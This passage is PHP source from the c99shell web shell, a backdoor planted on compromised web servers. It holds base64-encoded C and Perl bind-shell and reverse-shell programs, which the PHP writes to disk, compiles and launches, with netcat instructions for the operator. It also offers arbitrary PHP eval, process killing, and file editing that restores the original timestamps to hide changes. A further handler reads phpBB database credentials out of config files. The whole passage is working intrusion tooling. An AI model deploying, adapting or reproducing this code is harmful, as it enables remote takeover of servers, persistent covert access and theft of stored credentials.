  2024. "ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
  2025. "KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
  2026. "ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
  2027. "c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
  2028. "LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
  2029. "Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
  2030. "CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
  2031. "ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
  2032. "DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
  2033. "CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
  2034. "ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
  2035. "aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
  2036. "J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
  2037. "ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
  2038. "fQ==",
  2039. "c99sh_backconn.pl"=>
  2040. "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
  2041. "HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
  2042. "DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
  2043. "HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
  2044. "CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
  2045. "GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
  2046. "WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
  2047. "iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
  2048. "VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
  2049. "FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
  2050. "c99sh_backconn.c"=>
  2051. "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
  2052. "dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
  2053. "Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
  2054. "YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
  2055. "aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
  2056. "cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
  2057. "XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
  2058. "DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
  2059. "Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
  2060. "KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
  2061. "ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
  2062. "c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
  2063. );
  2064. $bndportsrcs = array(
  2065. "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
  2066. "c99sh_bindport.c"=>array("Using C","%path %port %pass")
  2067. );
  2068. $bcsrcs = array(
  2069. "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  2070. "c99sh_backconn.c"=>array("Using C","%path %host %port")
  2071. );
  2072. if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
  2073. else
  2074. {
  2075. if (!is_array($bind)) {$bind = array();}
  2076. if (!is_array($bc)) {$bc = array();}
  2077. if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
  2078. if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  2079. if (empty($bc["host"])) {$bc["host"] = $REMOTE_ADDR;}
  2080. if (!is_numeric($bc["port"])) {$bc["port"] = $bindport_port;}
  2081. if (!empty($bindsubmit))
  2082. {
  2083. echo "<b>Result of binding port:</b><br>";
  2084. $v = $bndportsrcs[$bind["src"]];
  2085. if (empty($v)) {echo "Unknown file!<br>";}
  2086. elseif (fsockopen($SERVER_ADDR,$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  2087. else
  2088. {
  2089. $srcpath = $tmpdir.$bind["src"];
  2090. $w = explode(".",$bind["src"]);
  2091. $ext = $w[count($w)-1];
  2092. unset($w[count($w)-1]);
  2093. $binpath = $tmpdir.join(".",$w);
  2094. if ($ext == "pl") {$binpath = $srcpath;}
  2095. @unlink($srcpath);
  2096. $fp = fopen($srcpath,"ab+");
  2097. if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2098. else
  2099. {
  2100. $data = base64_decode($bndsrcs[$bind["src"]]);
  2101. fwrite($fp,$data,strlen($data));
  2102. fclose($fp);
  2103. if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2104. $v[1] = str_replace("%path",$binpath,$v[1]);
  2105. $v[1] = str_replace("%port",$bind["port"],$v[1]);
  2106. $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
  2107. $v[1] = str_replace("//","/",$v[1]);
  2108. $retbind = myshellexec($v[1]." > /dev/null &");
  2109. sleep(5);
  2110. $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
  2111. if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
  2112. else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
  2113. }
  2114. echo "<br>";
  2115. }
  2116. }
  2117. if (!empty($bcsubmit))
  2118. {
  2119. echo "<b>Result of back connection:</b><br>";
  2120. $v = $bcsrcs[$bc["src"]];
  2121. if (empty($v)) {echo "Unknown file!<br>";}
  2122. else
  2123. {
  2124. $srcpath = $tmpdir.$bc["src"];
  2125. $w = explode(".",$bc["src"]);
  2126. $ext = $w[count($w)-1];
  2127. unset($w[count($w)-1]);
  2128. $binpath = $tmpdir.join(".",$w);
  2129. if ($ext == "pl") {$binpath = $srcpath;}
  2130. @unlink($srcpath);
  2131. $fp = fopen($srcpath,"ab+");
  2132. if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2133. else
  2134. {
  2135. $data = base64_decode($bndsrcs[$bind[src]]);
  2136. fwrite($fp,$data,strlen($data));
  2137. fclose($fp);
  2138. if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2139. $v[1] = str_replace("%path",$binpath,$v[1]);
  2140. $v[1] = str_replace("%host",$bc["host"],$v[1]);
  2141. $v[1] = str_replace("%port",$bc["port"],$v[1]);
  2142. $v[1] = str_replace("//","/",$v[1]);
  2143. $retbind = myshellexec($v[1]." > /dev/null &");
  2144. echo "Now script try connect to ".$bc["host"].":".$bc["port"]."...<br>";
  2145. }
  2146. }
  2147. }
  2148. ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<?php echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
  2149. foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2150. ?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
  2151. <b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<?php echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
  2152. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2153. ?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
  2154. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
  2155. }
  2156. }
  2157. if ($act == "ps_aux")
  2158. {
  2159. echo "<b>Processes:</b><br>";
  2160. if ($win) {echo "This function not work in Windows!<br><br>";}
  2161. else
  2162. {
  2163. if ($pid)
  2164. {
  2165. if (!$sig) {$sig = 9;}
  2166. echo "Sending signal ".$sig." to #".$pid."... ";
  2167. $ret = posix_kill($pid,$sig);
  2168. if ($ret) {echo "ok. he is dead, amen.";}
  2169. else {echo "ERROR.";}
  2170. }
  2171. $ret = myshellexec("ps -aux");
  2172. if (!$ret) {echo "Can't execute \"ps -aux\"!";}
  2173. else
  2174. {
  2175. $ret = htmlspecialchars($ret);
  2176. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  2177. $stack = explode("\n",$ret);
  2178. $head = explode(" ",$stack[0]);
  2179. unset($stack[0]);
  2180. if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
  2181. if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
  2182. $k = $ps_aux_sort[0];
  2183. if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2184. else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2185. for($i=0;$i<count($head);$i++)
  2186. {
  2187. if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
  2188. }
  2189. $prcs = array();
  2190. foreach ($stack as $line)
  2191. {
  2192. if (!empty($line))
  2193. {
  2194. echo "<tr>";
  2195. $line = explode(" ",$line);
  2196. $line[10] = join(" ",array_slice($line,10,count($line)));
  2197. $line = array_slice($line,0,11);
  2198. if ($line[0] == get_current_user()) {$line[0] = "<font color=\"green\">".$line[0]."</font>";}
  2199. $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2200. $prcs[] = $line;
  2201. echo "</tr>";
  2202. }
  2203. }
  2204. $head[$k] = "<b>".$head[$k]."</b>".$y;
  2205. $head[] = "<b>ACTION</b>";
  2206. $v = $ps_aux_sort[0];
  2207. usort($prcs,"tabsort");
  2208. if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2209. $tab = array();
  2210. $tab[] = $head;
  2211. $tab = array_merge($tab,$prcs);
  2212. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2213. foreach($tab as $k)
  2214. {
  2215. echo "<tr>";
  2216. foreach($k as $v) {echo "<td>".$v."</td>";}
  2217.  
  2218. echo "</tr>";
  2219. }
  2220. echo "</table>";
  2221. }
  2222. }
  2223. }
  2224. if ($act == "eval")
  2225. {
  2226. if (!empty($eval))
  2227. {
  2228. echo "<b>Result of execution this PHP-code</b>:<br>";
  2229. $tmp = ob_get_contents();
  2230. $olddir = realpath(".");
  2231. @chdir($d);
  2232. if ($tmp)
  2233. {
  2234. ob_clean();
  2235. eval($eval);
  2236. $ret = ob_get_contents();
  2237. $ret = convert_cyr_string($ret,"d","w");
  2238. ob_clean();
  2239. echo $tmp;
  2240. if ($eval_txt)
  2241. {
  2242. $rows = count(explode("\r\n",$ret))+1;
  2243. if ($rows < 10) {$rows = 10;}
  2244. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2245. }
  2246. else {echo $ret."<br>";}
  2247. }
  2248. else
  2249. {
  2250. if ($eval_txt)
  2251. {
  2252. echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2253. eval($eval);
  2254. echo "</textarea>";
  2255. }
  2256. else {echo $ret;}
  2257. }
  2258. @chdir($olddir);
  2259. }
  2260. else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
  2261. echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2262. }
  2263. if ($act == "f")
  2264. {
  2265. if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2266. {
  2267. if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2268. else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2269. }
  2270. else
  2271. {
  2272. $r = @file_get_contents($d.$f);
  2273. $ext = explode(".",$f);
  2274. $c = count($ext)-1;
  2275. $ext = $ext[$c];
  2276. $ext = strtolower($ext);
  2277. $rft = "";
  2278. foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2279. if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2280. if (empty($ft)) {$ft = $rft;}
  2281. $arr = array(
  2282. array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  2283. array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  2284. array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  2285. array("Code","code"),
  2286. array("Session","phpsess"),
  2287. array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  2288. array("SDB","sdb"),
  2289. array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  2290. array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  2291. array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  2292. array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  2293. array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  2294. );
  2295. echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2296. foreach($arr as $t)
  2297. {
  2298. if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
  2299. elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  2300. else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2301. echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2302. }
  2303. echo "<hr size=\"1\" noshade>";
  2304. if ($ft == "info")
  2305. {
  2306. echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2307. if (!$win)
  2308. {
  2309. echo "<tr><td><b>Owner/Group</b></td><td> ";
  2310. $tmp = posix_getpwuid(fileowner($d.$f));
  2311. if ($tmp["name"] == "") {echo fileowner($d.$f)."/";}
  2312. else {echo $tmp["name"]."/";}
  2313. $tmp = posix_getgrgid(filegroup($d.$f));
  2314. if ($tmp["name"] == "") {echo filegroup($d.$f);}
  2315. else {echo $tmp['name'];}
  2316. }
  2317. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  2318. $fi = fopen($d.$f,"rb");
  2319. if ($fi)
  2320. {
  2321. if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2322. else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2323. $n = 0;
  2324. $a0 = "00000000<br>";
  2325. $a1 = "";
  2326. $a2 = "";
  2327. for ($i=0; $i<strlen($str); $i++)
  2328. {
  2329. $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2330. switch (ord($str[$i]))
  2331. {
  2332. case 0: $a2 .= "<font>0</font>"; break;
  2333. case 32:
  2334. case 10:
  2335. case 13: $a2 .= "&nbsp;"; break;
  2336. default: $a2 .= htmlspecialchars($str[$i]);
  2337. }
  2338. $n++;
  2339. if ($n == $hexdump_rows)
  2340. {
  2341. $n = 0;
  2342. if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2343. $a1 .= "<br>";
  2344. $a2 .= "<br>";
  2345. }
  2346. }
  2347. //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
  2348. echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  2349. }
  2350. $encoded = "";
  2351. if ($base64 == 1)
  2352. {
  2353. echo "<b>Base64 Encode</b><br>";
  2354. $encoded = base64_encode(file_get_contents($d.$f));
  2355. }
  2356. elseif($base64 == 2)
  2357. {
  2358. echo "<b>Base64 Encode + Chunk</b><br>";
  2359. $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2360. }
  2361. elseif($base64 == 3)
  2362. {
  2363. echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2364. $encoded = base64_encode(file_get_contents($d.$f));
  2365. $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2366. }
  2367. elseif($base64 == 4)
  2368. {
  2369. $text = file_get_contents($d.$f);
  2370. $encoded = base64_decode($text);
  2371. echo "<b>Base64 Decode";
  2372. if (base64_encode($encoded) != $text) {echo " (failed)";}
  2373. echo "</b><br>";
  2374. }
  2375. if (!empty($encoded))
  2376. {
  2377. echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2378. }
  2379. echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2380. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2381. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2382. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2383. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2384. <P>";
  2385. }
  2386. elseif ($ft == "html")
  2387. {
  2388. if ($white) {@ob_clean();}
  2389. echo $r;
  2390. if ($white) {exit;}
  2391. }
  2392. elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2393. elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";}
  2394. elseif ($ft == "phpsess")
  2395. {
  2396. echo "<pre>";
  2397. $v = explode("|",$r);
  2398. echo $v[0]."<br>";
  2399. var_dump(unserialize($v[1]));
  2400. echo "</pre>";
  2401. }
  2402. elseif ($ft == "exe")
  2403. {
  2404. $ext = explode(".",$f);
  2405. $c = count($ext)-1;
  2406. $ext = $ext[$c];
  2407. $ext = strtolower($ext);
  2408. $rft = "";
  2409. foreach($exeftypes as $k=>$v)
  2410. {
  2411. if (in_array($ext,$v)) {$rft = $k; break;}
  2412. }
  2413. $cmd = str_replace("%f%",$f,$rft);
  2414. echo "<b>Execute file:</b><form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=\"hidden\" name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=\"submit\" name=\"submit\" value=\"Execute\"></form>";
  2415. }
  2416. elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2417. elseif ($ft == "code")
  2418. {
  2419. if (ereg("phpBB 2.(.*) auto-generated config file",$r))
  2420. {
  2421. $arr = explode("\n",$r);
  2422. if (count($arr == 18))
  2423. {
  2424. include($d.$f);
  2425. echo "<b>phpBB configuration is detected in this file!<br>";
  2426. if ($dbms == "mysql4") {$dbms = "mysql";}
  2427. if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2428. else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
  2429. echo "Parameters for manual connect:<br>";
  2430. $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2431. foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2432. echo "</b><hr size=\"1\" noshade>";
  2433. }
  2434. }
  2435. echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2436. if (!empty($white)) {@ob_clean();}
  2437. highlight_file($d.$f);
  2438. if (!empty($white)) {exit;}
  2439. echo "</div>";
  2440. }
  2441. elseif ($ft == "download")
  2442. {
  2443. @ob_clean();
  2444. header("Content-type: application/octet-stream");
  2445. header("Content-length: ".filesize($d.$f));
  2446. header("Content-disposition: attachment; filename=\"".$f."\";");
  2447. echo $r;
  2448. exit;
  2449. }
  2450. elseif ($ft == "notepad")
  2451. {
  2452. @ob_clean();
  2453. header("Content-type: text/plain");
  2454. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2455. echo($r);
  2456. exit;
  2457. }
  2458. elseif ($ft == "img")
  2459. {
  2460. $inf = getimagesize($d.$f);
  2461. if (!$white)
  2462. {
  2463. if (empty($imgsize)) {$imgsize = 20;}
  2464. $width = $inf[0]/100*$imgsize;
  2465. $height = $inf[1]/100*$imgsize;
  2466. echo "<center><b>Size:</b>&nbsp;";
  2467. $sizes = array("100","50","20");
  2468. foreach ($sizes as $v)
  2469. {
  2470. echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2471. if ($imgsize != $v ) {echo $v;}
  2472. else {echo "<u>".$v."</u>";}
  2473. echo "</a>&nbsp;&nbsp;&nbsp;";
  2474. }
  2475. echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2476. }
  2477. else
  2478. {
  2479. @ob_clean();
  2480. $ext = explode($f,".");
  2481. $ext = $ext[count($ext)-1];
  2482. header("Content-type: ".$inf["mime"]);
  2483. readfile($d.$f);
  2484. exit;
  2485. }
  2486. }
  2487. elseif ($ft == "edit")
  2488. {
  2489. if (!empty($submit))
  2490. {
  2491. if ($filestealth) {$stat = stat($d.$f);}
  2492. $fp = fopen($d.$f,"w");
  2493. if (!$fp) {echo "<b>Can't write to file!</b>";}
  2494. else
  2495. {
  2496. echo "<b>Saved!</b>";
  2497. fwrite($fp,$edit_text);
  2498. fclose($fp);
  2499. if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2500. $r = $edit_text;
  2501. }
  2502. }
  2503. $rows = count(explode("\r\n",$r));
  2504. if ($rows < 10) {$rows = 10;}
  2505. if ($rows > 30) {$rows = 30;}
  2506. echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2507. }
  2508. elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2509. else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2510. }
  2511. }
  2512. }
  2513. else
  2514. {
  2515. @ob_clean();
  2516. $images = array(
  2517. "arrow_ltr"=>
  2518. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  2519. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2520. "back"=>
  2521. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2522. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
